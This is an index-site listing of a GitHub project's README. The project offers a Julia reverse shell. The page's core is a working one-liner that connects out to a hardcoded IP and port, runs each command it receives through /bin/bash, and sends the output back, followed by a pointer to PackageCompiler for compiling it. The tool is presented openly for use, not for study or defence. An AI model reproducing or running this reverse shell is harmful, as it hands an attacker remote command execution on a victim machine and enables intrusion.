An open API service indexing awesome lists of open source software.

https://github.com/potato-industries/jrs

julia reverse shell
https://github.com/potato-industries/jrs

julia julia-language reverse-shell

Last synced: 9 months ago
JSON representation

julia reverse shell

Awesome Lists containing this project

README

          

# jrs

julia reverse shell

https://julialang.org/

```
julia --eval 'using Sockets;c = connect("192.168.8.139", 9090);while true;cmd = readline(c, keep=true);try;println(c, read(`/bin/bash -c $cmd`, String));catch e;print(c, e);end;end'
```

**Compile**

https://github.com/JuliaLang/PackageCompiler.jl

Enjoy~